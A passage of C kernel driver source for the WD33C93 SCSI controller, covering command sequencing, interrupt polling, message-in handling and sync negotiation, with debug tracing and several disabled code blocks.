CSR_LOG_BUF_SIZE csrbuf[bufptr++] = csr; #endif switch (csr) { case SBIC_CSR_S_XFERRED: case SBIC_CSR_DISC: case SBIC_CSR_DISC_1: dev->sc_flags &= ~SBICF_SELECTED; GET_SBIC_cmd_phase (regs, phase); if (phase == 0x60) { GET_SBIC_tlun (regs, dev->sc_stat[0]); i = 0; /* done */ /* break;*/ /* Bypass all the state gobldygook */ } else { #ifdef DEBUG if(reselect_debug>1) printf("sbicicmd: handling disconnect\n"); #endif i = SBIC_STATE_DISCONNECT; } break; case SBIC_CSR_XFERRED|CMD_PHASE: case SBIC_CSR_MIS|CMD_PHASE: case SBIC_CSR_MIS_1|CMD_PHASE: case SBIC_CSR_MIS_2|CMD_PHASE: if (sbicxfstart(regs, clen, CMD_PHASE, sbic_cmd_wait)) if (sbicxfout(regs, clen, cbuf, CMD_PHASE)) i = sbicabort(dev, regs,"icmd sending cmd"); #if 0 GET_SBIC_csr(regs, csr); /* Lets us reload tcount */ WAIT_CIP(regs); GET_SBIC_asr(regs, asr); CSR_TRACE('I',csr,asr,target); if( asr & (SBIC_ASR_BSY|SBIC_ASR_LCI|SBIC_ASR_CIP) ) printf("next: cmd sent asr %02x, csr %02x\n", asr, csr); #endif break; #if 0 case SBIC_CSR_XFERRED|DATA_OUT_PHASE: case SBIC_CSR_XFERRED|DATA_IN_PHASE: case SBIC_CSR_MIS|DATA_OUT_PHASE: case SBIC_CSR_MIS|DATA_IN_PHASE: case SBIC_CSR_MIS_1|DATA_OUT_PHASE: case SBIC_CSR_MIS_1|DATA_IN_PHASE: case SBIC_CSR_MIS_2|DATA_OUT_PHASE: case SBIC_CSR_MIS_2|DATA_IN_PHASE: if (acb->sc_kv.dc_count <= 0) i = sbicabort(dev, regs, "icmd out of data"); else { wait = sbic_data_wait; if (sbicxfstart(regs, acb->sc_kv.dc_count, SBIC_PHASE(csr), wait)) if (csr & 0x01) /* data in? */ i=sbicxfin(regs, acb->sc_kv.dc_count, acb->sc_kv.dc_addr); else i=sbicxfout(regs, acb->sc_kv.dc_count, acb->sc_kv.dc_addr, SBIC_PHASE(csr)); acb->sc_kv.dc_addr += (acb->sc_kv.dc_count - i); acb->sc_kv.dc_count = i; i = 1; } break; #endif case SBIC_CSR_XFERRED|STATUS_PHASE: case SBIC_CSR_MIS|STATUS_PHASE: case SBIC_CSR_MIS_1|STATUS_PHASE: case SBIC_CSR_MIS_2|STATUS_PHASE: /* * the sbic does the status/cmd-complete reading ok, * so do this with its hi-level commands. 
*/ #ifdef DEBUG if(sbic_debug) printf("SBICICMD status phase\n"); #endif SBIC_TC_PUT(regs, 0); SET_SBIC_cmd_phase(regs, 0x46); SET_SBIC_cmd(regs, SBIC_CMD_SEL_ATN_XFER); break; #if THIS_IS_A_RESERVED_STATE case BUS_FREE_PHASE: /* This is not legal */ if( dev->sc_stat[0] != 0xff ) goto out; break; #endif default: i = sbicnextstate(dev, csr, asr); } /* * make sure the last command was taken, * ie. we're not hunting after an ignored command.. */ GET_SBIC_asr(regs, asr); /* tapes may take a loooong time.. */ while (asr & SBIC_ASR_BSY){ if(asr & SBIC_ASR_DBR) { printf("sbicicmd: Waiting while sbic is jammed, CSR:%02x,ASR:%02x\n", csr,asr); #ifdef DDB Debugger(); #endif /* SBIC is jammed */ /* DUNNO which direction */ /* Try old direction */ GET_SBIC_data(regs,i); GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR) /* Wants us to write */ SET_SBIC_data(regs,i); } GET_SBIC_asr(regs, asr); } /* * wait for last command to complete */ if (asr & SBIC_ASR_LCI) { printf("sbicicmd: last command ignored\n"); } else if( i == 1 ) /* Bsy */ SBIC_WAIT (regs, SBIC_ASR_INT, wait); /* * do it again */ } while ( i > 0 && dev->sc_stat[0] == 0xff); /* Sometimes we need to do an extra read of the CSR */ GET_SBIC_csr(regs, csr); CSR_TRACE('I',csr,asr,0xff); #if CSR_LOG_BUF_SIZE if(reselect_debug>1) for(i=0; i<bufptr; i++) printf("CSR:%02x", csrbuf[i]); #endif #ifdef DEBUG if(data_pointer_debug > 1) printf("sbicicmd done(%d,%d):%d =%d=\n", dev->target, lun, acb->sc_kv.dc_count, dev->sc_stat[0]); #endif QPRINTF(("=STS:%02x=", dev->sc_stat[0])); dev->sc_flags &= ~SBICF_ICMD; SBIC_TRACE(dev); return(dev->sc_stat[0]); } /* * Finish SCSI xfer command: After the completion interrupt from * a read/write operation, sequence through the final phases in * programmed i/o. This routine is a lot like sbicicmd except we * skip (and don't allow) the select, cmd out and data in/out phases. 
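 * In other words, only the status and command-complete (message-in)
 * phases should remain to be sequenced here.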
*/ void sbicxfdone(dev, regs, target) struct sbic_softc *dev; sbic_regmap_p regs; int target; { u_char phase, asr, csr; int s; SBIC_TRACE(dev); QPRINTF(("{")); s = splbio(); /* * have the sbic complete on its own */ SBIC_TC_PUT(regs, 0); SET_SBIC_cmd_phase(regs, 0x46); SET_SBIC_cmd(regs, SBIC_CMD_SEL_ATN_XFER); do { asr = SBIC_WAIT (regs, SBIC_ASR_INT, 0); GET_SBIC_csr (regs, csr); CSR_TRACE('f',csr,asr,target); QPRINTF(("%02x:", csr)); } while ((csr != SBIC_CSR_DISC) && (csr != SBIC_CSR_DISC_1) && (csr != SBIC_CSR_S_XFERRED)); dev->sc_flags &= ~SBICF_SELECTED; GET_SBIC_cmd_phase (regs, phase); QPRINTF(("}%02x", phase)); if (phase == 0x60) GET_SBIC_tlun(regs, dev->sc_stat[0]); else sbicerror(dev, regs, csr); QPRINTF(("=STS:%02x=\n", dev->sc_stat[0])); splx(s); SBIC_TRACE(dev); } /* * No DMA chains */ int sbicgo(dev, xs) struct sbic_softc *dev; struct scsipi_xfer *xs; { int i, dmaflags, count, usedma; /* int wait;*/ /* u_char cmd;*/ u_char *addr, asr = 0, csr = 0; sbic_regmap_p regs; struct sbic_acb *acb; SBIC_TRACE(dev); dev->target = xs->sc_link->scsipi_scsi.target; dev->lun = xs->sc_link->scsipi_scsi.lun; acb = dev->sc_nexus; regs = dev->sc_sbicp; usedma = sbicdmaok(dev, xs); #ifdef DEBUG routine = 1; debug_sbic_regs = regs; /* store this to allow debug calls */ if( data_pointer_debug > 1 ) printf("sbicgo(%d,%d)\n", dev->target, dev->lun); #endif /* * set the sbic into DMA mode */ if( usedma ) SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI | SBIC_MACHINE_DMA_MODE); else SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI); /* * select the SCSI bus (it's an error if bus isn't free) */ if (sbicselectbus(dev, regs, dev->target, dev->lun, dev->sc_scsiaddr)) { /* printf("sbicgo: Trying to select busy bus!\n"); */ SBIC_TRACE(dev); return(0); /* Not done: needs to be rescheduled */ } dev->sc_stat[0] = 0xff; /* * Calculate DMA chains now */ dmaflags = 0; if (acb->flags & ACB_DATAIN) dmaflags |= DMAGO_READ; /* * Deal w/bounce buffers. */ addr = acb->sc_kv.dc_addr; count = acb->sc_kv.dc_count; #if 0 /* mark */ if (count && (char *)kvtop(addr) != acb->sc_pa.dc_addr) { /* XXXX check */ printf("sbic: DMA buffer mapping changed %x->%x\n", acb->sc_pa.dc_addr, kvtop(addr)); #ifdef DDB Debugger(); #endif } #endif #ifdef DEBUG ++sbicdma_ops; /* count total DMA operations */ #endif if (usedma) panic("sbic: Cannot use DMA\n"); #if 0 if (count && usedma && dev->sc_flags & SBICF_BADDMA && sbiccheckdmap(addr, count, dev->sc_dmamask)) { /* * need to bounce the dma. */ if (dmaflags & DMAGO_READ) { acb->flags |= ACB_BBUF; acb->sc_dmausrbuf = addr; acb->sc_dmausrlen = count; acb->sc_usrbufpa = (u_char *)kvtop(addr); if(!dev->sc_tinfo[dev->target].bounce) { printf("sbicgo: HELP! 
no bounce allocated for %d\n", dev->target); printf("xfer: (%p->%p,%lx)\n", acb->sc_dmausrbuf, acb->sc_usrbufpa, acb->sc_dmausrlen); dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce = (char *)alloc_z2mem(MAXPHYS); if (isztwomem(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)) printf("alloc ZII target %d bounce pa 0x%x\n", xs->sc_link->scsipi_scsi.target, kvtop(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)); else if (dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce) printf("alloc CHIP target %d bounce pa 0x%x\n", xs->sc_link->scsipi_scsi.target, PREP_DMA_MEM(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)); printf("Allocating %d bounce at %x\n", dev->target, kvtop(dev->sc_tinfo[dev->target].bounce)); } } else { /* write: copy to dma buffer */ #ifdef DEBUG if(data_pointer_debug) printf("sbicgo: copying %x bytes to target %d bounce %x\n", count, dev->target, kvtop(dev->sc_tinfo[dev->target].bounce)); #endif bcopy (addr, dev->sc_tinfo[dev->target].bounce, count); } addr = dev->sc_tinfo[dev->target].bounce;/* and use dma buffer */ acb->sc_kv.dc_addr = addr; #ifdef DEBUG ++sbicdma_bounces; /* count number of bounced */ #endif } #endif /* * Allocate the DMA chain */ /* Set start KVM addresses */ #if 0 acb->sc_kv.dc_addr = addr; acb->sc_kv.dc_count = count; #endif /* Mark end of segment */ acb->sc_tcnt = dev->sc_tcnt = 0; acb->sc_pa.dc_count = 0; sbic_load_ptrs(dev, regs, dev->target, dev->lun); SBIC_TRACE(dev); /* Enable interrupts but don't do any DMA */ dev->sc_enintr(dev); if (usedma) { dev->sc_tcnt = dev->sc_dmago(dev, acb->sc_pa.dc_addr, acb->sc_pa.dc_count, dmaflags); #ifdef DEBUG dev->sc_dmatimo = dev->sc_tcnt ? 1 : 0; #endif } else dev->sc_dmacmd = 0; /* Don't use DMA */ dev->sc_flags |= SBICF_INDMA; /* SBIC_TC_PUT(regs, dev->sc_tcnt);*/ /* XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX */ SBIC_TRACE(dev); sbic_save_ptrs(dev, regs, dev->target, dev->lun); /* * push the data cache ( I think this won't work (EH)) */ #if defined(M68040) if (mmutype == MMU_68040 && usedma && count) { dma_cachectl(addr, count); if (((u_int)addr & 0xF) || (((u_int)addr + count) & 0xF)) dev->sc_flags |= SBICF_DCFLUSH; } #endif /* * enintr() also enables interrupts for the sbic */ #ifdef DEBUG if( data_pointer_debug > 1 ) printf("sbicgo dmago:%d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr,dev->sc_tcnt); debug_asr = asr; debug_csr = csr; #endif /* * Let's cycle a while then let the interrupt handler take over */ asr = GET_SBIC_asr(regs, asr); do { GET_SBIC_csr(regs, csr); CSR_TRACE('g',csr,asr,dev->target); #ifdef DEBUG debug_csr = csr; routine = 1; #endif QPRINTF(("go[0x%x]", csr)); i = sbicnextstate(dev, csr, asr); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); #ifdef DEBUG debug_asr = asr; #endif if(asr & SBIC_ASR_LCI) printf("sbicgo: LCI asr:%02x csr:%02x\n", asr,csr); } while( i == SBIC_STATE_RUNNING && asr & (SBIC_ASR_INT|SBIC_ASR_LCI) ); CSR_TRACE('g',csr,asr,i<<4); SBIC_TRACE(dev); if (i == SBIC_STATE_DONE && dev->sc_stat[0] == 0xff) printf("sbicgo: done & stat = 0xff\n"); if (i == SBIC_STATE_DONE && dev->sc_stat[0] != 0xff) { /* if( i == SBIC_STATE_DONE && dev->sc_stat[0] ) { */ /* Did we really finish that fast? */ return 1; } return 0; } int sbicintr(dev) struct sbic_softc *dev; { sbic_regmap_p regs; /* struct dma_chain *df, *dl;*/ u_char asr, csr; /* u_char *tmpaddr;*/ /* struct sbic_acb *acb;*/ int i; /* int newtarget, newlun;*/ /* unsigned tcnt;*/ regs = dev->sc_sbicp; /* * pending interrupt?
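 * (ASR_INT stays asserted while the chip has an unserviced interrupt
 * condition; if it is clear there is nothing for this handler to do.)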
*/ GET_SBIC_asr (regs, asr); if ((asr & SBIC_ASR_INT) == 0) return(0); SBIC_TRACE(dev); do { GET_SBIC_csr(regs, csr); CSR_TRACE('i',csr,asr,dev->target); #ifdef DEBUG debug_csr = csr; routine = 2; #endif QPRINTF(("intr[0x%x]", csr)); i = sbicnextstate(dev, csr, asr); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); #ifdef DEBUG debug_asr = asr; #endif #if 0 if(asr & SBIC_ASR_LCI) printf("sbicintr: LCI asr:%02x csr:%02x\n", asr,csr); #endif } while(i == SBIC_STATE_RUNNING && asr & (SBIC_ASR_INT|SBIC_ASR_LCI)); CSR_TRACE('i',csr,asr,i<<4); SBIC_TRACE(dev); return(1); } /* * Run commands and wait for disconnect */ int sbicpoll(dev) struct sbic_softc *dev; { sbic_regmap_p regs; u_char asr, csr; /* struct sbic_pending* pendp;*/ int i; /* unsigned tcnt;*/ SBIC_TRACE(dev); regs = dev->sc_sbicp; do { GET_SBIC_asr (regs, asr); #ifdef DEBUG debug_asr = asr; #endif GET_SBIC_csr(regs, csr); CSR_TRACE('p',csr,asr,dev->target); #ifdef DEBUG debug_csr = csr; routine = 2; #endif QPRINTF(("poll[0x%x]", csr)); i = sbicnextstate(dev, csr, asr); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); /* tapes may take a loooong time.. */ while (asr & SBIC_ASR_BSY){ if(asr & SBIC_ASR_DBR) { printf("sbicpoll: Waiting while sbic is jammed, CSR:%02x,ASR:%02x\n", csr,asr); #ifdef DDB Debugger(); #endif /* SBIC is jammed */ /* DUNNO which direction */ /* Try old direction */ GET_SBIC_data(regs,i); GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR) /* Wants us to write */ SET_SBIC_data(regs,i); } GET_SBIC_asr(regs, asr); } if(asr & SBIC_ASR_LCI) printf("sbicpoll: LCI asr:%02x csr:%02x\n", asr,csr); else if( i == 1 ) /* BSY */ SBIC_WAIT(regs, SBIC_ASR_INT, sbic_cmd_wait); } while(i == SBIC_STATE_RUNNING); CSR_TRACE('p',csr,asr,i<<4); SBIC_TRACE(dev); return(1); } /* * Handle a single msgin */ int sbicmsgin(dev) struct sbic_softc *dev; { sbic_regmap_p regs; int recvlen; u_char asr, csr, *tmpaddr; regs = dev->sc_sbicp; dev->sc_msg[0] = 0xff; dev->sc_msg[1] = 0xff; GET_SBIC_asr(regs, asr); #ifdef DEBUG if(reselect_debug>1) printf("sbicmsgin asr=%02x\n", asr); #endif sbic_save_ptrs(dev, regs, dev->target, dev->lun); GET_SBIC_selid (regs, csr); SET_SBIC_selid (regs, csr | SBIC_SID_FROM_SCSI); SBIC_TC_PUT(regs, 0); tmpaddr = dev->sc_msg; recvlen = 1; do { while( recvlen-- ) { asr = GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); QPRINTF(("sbicmsgin ready to go (csr,asr)=(%02x,%02x)\n", csr, asr)); RECV_BYTE(regs, *tmpaddr); CSR_TRACE('m',csr,asr,*tmpaddr); #if 1 /* * get the command completion interrupt, or we * can't send a new command (LCI) */ SBIC_WAIT(regs, SBIC_ASR_INT, 0); GET_SBIC_csr(regs, csr); CSR_TRACE('X',csr,asr,dev->target); #else WAIT_CIP(regs); do { GET_SBIC_asr(regs, asr); csr = 0xff; GET_SBIC_csr(regs, csr); CSR_TRACE('X',csr,asr,dev->target); if( csr == 0xff ) printf("sbicmsgin waiting: csr %02x asr %02x\n", csr, asr); } while( csr == 0xff ); #endif #ifdef DEBUG if(reselect_debug>1) printf("sbicmsgin: got %02x csr %02x asr %02x\n", *tmpaddr, csr, asr); #endif #if do_parity_check if( asr & SBIC_ASR_PE ) { printf ("Parity error"); /* This code simply does not work.
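 * The intent is the standard SCSI parity recovery: assert ATN, wait for
 * the target to enter message-out phase, then send MSG_PARITY_ERROR so
 * the target resends the garbled message.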
*/ WAIT_CIP(regs); SET_SBIC_cmd(regs, SBIC_CMD_SET_ATN); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); WAIT_CIP(regs); SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); WAIT_CIP(regs); if( !(asr & SBIC_ASR_LCI) ) /* Target wants to send garbled msg*/ continue; printf("--fixing\n"); /* loop until a msgout phase occurs on target */ while((csr & 0x07) != MESG_OUT_PHASE) { while( asr & SBIC_ASR_BSY && !(asr & (SBIC_ASR_DBR|SBIC_ASR_INT)) ) GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR ) panic("msgin: jammed again!\n"); GET_SBIC_csr(regs, csr); CSR_TRACE('e',csr,asr,dev->target); if( (csr & 0x07) != MESG_OUT_PHASE ) { sbicnextstate(dev, csr, asr); sbic_save_ptrs(dev, regs, dev->target, dev->lun); } } /* Should be msg out by now */ SEND_BYTE(regs, MSG_PARITY_ERROR); } else #endif tmpaddr++; if(recvlen) { /* Clear ACK */ WAIT_CIP(regs); GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); CSR_TRACE('X',csr,asr,dev->target); QPRINTF(("sbicmsgin pre byte CLR_ACK (csr,asr)=(%02x,%02x)\n", csr, asr)); SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); SBIC_WAIT(regs, SBIC_ASR_INT, 0); } } if(dev->sc_msg[0] == 0xff) { printf("sbicmsgin: sbic swallowed our message\n"); break; } #ifdef DEBUG if (sync_debug) printf("msgin done csr 0x%x asr 0x%x msg 0x%x\n", csr, asr, dev->sc_msg[0]); #endif /* * test whether this is a reply to our sync * request */ if (MSG_ISIDENTIFY(dev->sc_msg[0])) { QPRINTF(("IFFY")); #if 0 /* There is an implied load-ptrs here */ sbic_load_ptrs(dev, regs, dev->target, dev->lun); #endif /* Got IFFY msg -- ack it */ } else if (dev->sc_msg[0] == MSG_REJECT && dev->sc_sync[dev->target].state == SYNC_SENT) { QPRINTF(("REJECT of SYN")); #ifdef DEBUG if (sync_debug) printf("target %d rejected sync, going async\n", dev->target); #endif dev->sc_sync[dev->target].period = sbic_min_period; dev->sc_sync[dev->target].offset = 0; dev->sc_sync[dev->target].state = SYNC_DONE; SET_SBIC_syn(regs, SBIC_SYN(dev->sc_sync[dev->target].offset, dev->sc_sync[dev->target].period)); } else if ((dev->sc_msg[0] == MSG_REJECT)) { QPRINTF(("REJECT")); /* * we'll never REJECT a REJECT message.. */ } else if ((dev->sc_msg[0] == MSG_SAVE_DATA_PTR)) { QPRINTF(("MSG_SAVE_DATA_PTR")); /* * don't reject this either. */ } else if ((dev->sc_msg[0] == MSG_DISCONNECT)) { QPRINTF(("DISCONNECT")); #ifdef DEBUG if( reselect_debug>1 && dev->sc_msg[0] == MSG_DISCONNECT ) printf("sbicmsgin: got disconnect msg %s\n", (dev->sc_flags & SBICF_ICMD)?"rejecting":""); #endif if( dev->sc_flags & SBICF_ICMD ) { /* We're in immediate mode. Prevent disconnects. */ /* prepare to reject the message, NACK */ SET_SBIC_cmd(regs, SBIC_CMD_SET_ATN); WAIT_CIP(regs); } } else if (dev->sc_msg[0] == MSG_CMD_COMPLETE ) { QPRINTF(("CMD_COMPLETE")); /* !! KLUDGE ALERT !! quite a few drives don't seem to * really like the current way of sending the * sync-handshake together with the ident-message, and * they react by sending command-complete and * disconnecting right after returning the valid sync * handshake. So, all I can do is reselect the drive, * and hope it won't disconnect again. I don't think * this is valid behavior, but I can't help fixing a * problem that apparently exists. * * Note: we should not get here on `normal' command * completion, as that condition is handled by the * high-level sel&xfer resume command used to walk * thru status/cc-phase. */ #ifdef DEBUG if (sync_debug) printf ("GOT MSG %d! target %d acting weird..
" waiting for disconnect...\n", dev->sc_msg[0], dev->target); #endif /* Check to see if sbic is handling this */ GET_SBIC_asr(regs, asr); if(asr & SBIC_ASR_BSY) return SBIC_STATE_RUNNING; /* Let's try this: Assume it works and set status to 00 */ dev->sc_stat[0] = 0; } else if (dev->sc_msg[0] == MSG_EXT_MESSAGE && tmpaddr == &dev->sc_msg[1]) { QPRINTF(("ExtMSG\n")); /* Read in whole extended message */ SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); SBIC_WAIT(regs, SBIC_ASR_INT, 0); GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); QPRINTF(("CLR ACK asr %02x, csr %02x\n", asr, csr)); RECV_BYTE(regs, *tmpaddr); CSR_TRACE('x',csr,asr,*tmpaddr); /* Wait for command completion IRQ */ SBIC_WAIT(regs, SBIC_ASR_INT, 0); recvlen = *tmpaddr++; QPRINTF(("Recving ext msg, asr %02x csr %02x len %02x\n", asr, csr, recvlen)); } else if (dev->sc_msg[0] == MSG_EXT_MESSAGE && dev->sc_msg[1] == 3 && dev->sc_msg[2] == MSG_SYNC_REQ) { QPRINTF(("SYN")); dev->sc_sync[dev->target].period = sbicfromscsiperiod(dev, regs, dev->sc_msg[3]); dev->sc_sync[dev->target].offset = dev->sc_msg[4]; dev->sc_sync[dev->target].state = SYNC_DONE; SET_SBIC_syn(regs, SBIC_SYN(dev->sc_sync[dev->target].offset, dev->sc_sync[dev->target].period)); printf("%s: target %d now synchronous," " period=%dns, offset=%d.\n", dev->sc_dev.dv_xname, dev->target, dev->sc_msg[3] * 4, dev->sc_msg[4]); } else { #ifdef DEBUG if (sbic_debug || sync_debug) printf ("sbicmsgin: Rejecting message 0x%02x\n", dev->sc_msg[0]); #endif /* prepare to reject the message, NACK */ SET_SBIC_cmd(regs, SBIC_CMD_SET_ATN); WAIT_CIP(regs); } /* Clear ACK */ WAIT_CIP(regs); GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); CSR_TRACE('X',csr,asr,dev->target); QPRINTF(("sbicmsgin pre CLR_ACK (csr,asr)=(%02x,%02x)%d\n", csr, asr, recvlen)); SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); SBIC_WAIT(regs, SBIC_ASR_INT, 0); } #if 0 while((csr == SBIC_CSR_MSGIN_W_ACK) || (SBIC_PHASE(csr) == MESG_IN_PHASE)); #else while (recvlen>0); #endif QPRINTF(("sbicmsgin finished: csr %02x, asr %02x\n",csr, asr)); /* Should still have one CSR to read */ return SBIC_STATE_RUNNING; } /* * sbicnextstate() * return: * 0 == done * 1 == working * 2 == disconnected * -1 == error */ int sbicnextstate(dev, csr, asr) struct sbic_softc *dev; u_char csr, asr; { sbic_regmap_p regs; /* struct dma_chain *df, *dl;*/ struct sbic_acb *acb; /* int i;*/ int newtarget, newlun, wait; /* unsigned tcnt;*/ SBIC_TRACE(dev); regs = dev->sc_sbicp; acb = dev->sc_nexus; QPRINTF(("next[%02x,%02x]",asr,csr)); switch (csr) { case SBIC_CSR_XFERRED|CMD_PHASE: case SBIC_CSR_MIS|CMD_PHASE: case SBIC_CSR_MIS_1|CMD_PHASE: case SBIC_CSR_MIS_2|CMD_PHASE: sbic_save_ptrs(dev, regs, dev->target, dev->lun); if (sbicxfstart(regs, acb->clen, CMD_PHASE, sbic_cmd_wait)) if (sbicxfout(regs, acb->clen, &acb->cmd, CMD_PHASE)) goto abort; break; case SBIC_CSR_XFERRED|STATUS_PHASE: case SBIC_CSR_MIS|STATUS_PHASE: case SBIC_CSR_MIS_1|STATUS_PHASE: case SBIC_CSR_MIS_2|STATUS_PHASE: /* * this should be the normal i/o completion case. * get the status & cmd complete msg then let the * device driver look at what happened. */ sbicxfdone(dev,regs,dev->target); /* * check for overlapping cache line, flush if so */ #ifdef M68040 if (dev->sc_flags & SBICF_DCFLUSH) { #if 0 printf("sbic: 68040 DMA cache flush needs fixing? 
%x:%x\n", dev->sc_xs->data, dev->sc_xs->datalen); #endif } #endif #ifdef DEBUG if( data_pointer_debug > 1 ) printf("next dmastop: %d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr,dev->sc_tcnt); dev->sc_dmatimo = 0; #endif dev->sc_dmastop(dev); /* was dmafree */ if (acb->flags & ACB_BBUF) { if ((u_char *)kvtop(acb->sc_dmausrbuf) != acb->sc_usrbufpa) printf("%s: WARNING - buffer mapping changed %p->%x\n", dev->sc_dev.dv_xname, acb->sc_usrbufpa, kvtop(acb->sc_dmausrbuf)); #ifdef DEBUG if(data_pointer_debug) printf("sbicgo:copying %lx bytes from target %d bounce %x\n", acb->sc_dmausrlen, dev->target, kvtop(dev->sc_tinfo[dev->target].bounce)); #endif bcopy(dev->sc_tinfo[dev->target].bounce, acb->sc_dmausrbuf, acb->sc_dmausrlen); } dev->sc_flags &= ~(SBICF_INDMA | SBICF_DCFLUSH); sbic_scsidone(acb, dev->sc_stat[0]); SBIC_TRACE(dev); return SBIC_STATE_DONE; case SBIC_CSR_XFERRED|DATA_OUT_PHASE: case SBIC_CSR_XFERRED|DATA_IN_PHASE: case SBIC_CSR_MIS|DATA_OUT_PHASE: case SBIC_CSR_MIS|DATA_IN_PHASE: case SBIC_CSR_MIS_1|DATA_OUT_PHASE: case SBIC_CSR_MIS_1|DATA_IN_PHASE: case SBIC_CSR_MIS_2|DATA_OUT_PHASE: case SBIC_CSR_MIS_2|DATA_IN_PHASE: { int i = 0; if( dev->sc_xs->flags & SCSI_POLL || dev->sc_flags & SBICF_ICMD || acb->sc_dmacmd == 0 ) { /* Do PIO */ SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI); if (acb->sc_kv.dc_count <= 0) { printf("sbicnextstate:xfer count %d asr%x csr%x\n", acb->sc_kv.dc_count, asr, csr); goto abort; } wait = sbic_data_wait; if( sbicxfstart(regs, acb->sc_kv.dc_count, SBIC_PHASE(csr), wait)) if( SBIC_PHASE(csr) == DATA_IN_PHASE ) /* data in? */ i=sbicxfin(regs, acb->sc_kv.dc_count, acb->sc_kv.dc_addr); else i=sbicxfout(regs, acb->sc_kv.dc_count, acb->sc_kv.dc_addr, SBIC_PHASE(csr)); acb->sc_kv.dc_addr += (acb->sc_kv.dc_count - i); acb->sc_kv.dc_count = i; } else { if (acb->sc_kv.dc_count <= 0) { printf("sbicnextstate:xfer count %d asr%x csr%x\n", acb->sc_kv.dc_count, asr, csr); goto abort; } /* * do scatter-gather dma * hacking the controller chip, ouch.. 
*/ SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI | SBIC_MACHINE_DMA_MODE); /* * set next dma addr and dec count */ #if 0 SBIC_TC_GET(regs, tcnt); dev->sc_cur->dc_count -= ((dev->sc_tcnt - tcnt) >> 1); dev->sc_cur->dc_addr += (dev->sc_tcnt - tcnt); dev->sc_tcnt = acb->sc_tcnt = tcnt; #else sbic_save_ptrs(dev, regs, dev->target, dev->lun); sbic_load_ptrs(dev, regs, dev->target, dev->lun); #endif #ifdef DEBUG if( data_pointer_debug > 1 ) printf("next dmanext: %d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr, dev->sc_tcnt); dev->sc_dmatimo = 1; #endif dev->sc_tcnt = dev->sc_dmanext(dev); SBIC_TC_PUT(regs, (unsigned)dev->sc_tcnt); SET_SBIC_cmd(regs, SBIC_CMD_XFER_INFO); dev->sc_flags |= SBICF_INDMA; } break; } case SBIC_CSR_XFERRED|MESG_IN_PHASE: case SBIC_CSR_MIS|MESG_IN_PHASE: case SBIC_CSR_MIS_1|MESG_IN_PHASE: case SBIC_CSR_MIS_2|MESG_IN_PHASE: SBIC_TRACE(dev); return sbicmsgin(dev); case SBIC_CSR_MSGIN_W_ACK: SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); /* Dunno what I'm ACKing */ printf("Acking unknown msgin CSR:%02x",csr); break; case SBIC_CSR_XFERRED|MESG_OUT_PHASE: case SBIC_CSR_MIS|MESG_OUT_PHASE: case SBIC_CSR_MIS_1|MESG_OUT_PHASE: case SBIC_CSR_MIS_2|MESG_OUT_PHASE: #ifdef DEBUG if (sync_debug) printf ("sending REJECT msg to last msg.\n"); #endif sbic_save_ptrs(dev, regs, dev->target, dev->lun); /* * should only get here on reject, * since it's always US that * initiate a sync transfer */ SEND_BYTE(regs, MSG_REJECT); WAIT_CIP(regs); if( asr & (SBIC_ASR_BSY|SBIC_ASR_LCI|SBIC_ASR_CIP) ) printf("next: REJECT sent asr %02x\n", asr); SBIC_TRACE(dev); return SBIC_STATE_RUNNING; case SBIC_CSR_DISC: case SBIC_CSR_DISC_1: dev->sc_flags &= ~(SBICF_INDMA|SBICF_SELECTED); /* Try to schedule another target */ #ifdef DEBUG if(reselect_debug>1) printf("sbicnext target %d disconnected\n", dev->target); #endif TAILQ_INSERT_HEAD(&dev->nexus_list, acb, chain); ++dev->sc_tinfo[dev->target].dconns; dev->sc_nexus = NULL; dev->sc_xs = NULL; if((acb->xs->flags & SCSI_POLL) || (dev->sc_flags & SBICF_ICMD) || (!sbic_parallel_operations) ) { SBIC_TRACE(dev); return SBIC_STATE_DISCONNECT; } sbic_sched(dev); SBIC_TRACE(dev); return SBIC_STATE_DISCONNECT; case SBIC_CSR_RSLT_NI: case SBIC_CSR_RSLT_IFY: GET_SBIC_rselid(regs, newtarget); /* check SBIC_RID_SIV? */ newtarget &= SBIC_RID_MASK; if (csr == SBIC_CSR_RSLT_IFY) { /* Read IFY msg to avoid lockup */ GET_SBIC_data(regs, newlun); WAIT_CIP(regs); newlun &= SBIC_TLUN_MASK; CSR_TRACE('r',csr,asr,newtarget); } else { /* Need to get IFY message */ for (newlun = 256; newlun; --newlun) { GET_SBIC_asr(regs, asr); if (asr & SBIC_ASR_INT) break; delay(1); } newlun = 0; /* XXXX */ if ((asr & SBIC_ASR_INT) == 0) { #ifdef DEBUG if (reselect_debug) printf("RSLT_NI - no IFFY message? asr %x\n", asr); #endif } else { GET_SBIC_csr(regs,csr); CSR_TRACE('n',csr,asr,newtarget); if ((csr == (SBIC_CSR_MIS|MESG_IN_PHASE)) || (csr == (SBIC_CSR_MIS_1|MESG_IN_PHASE)) || (csr == (SBIC_CSR_MIS_2|MESG_IN_PHASE))) { sbicmsgin(dev); newlun = 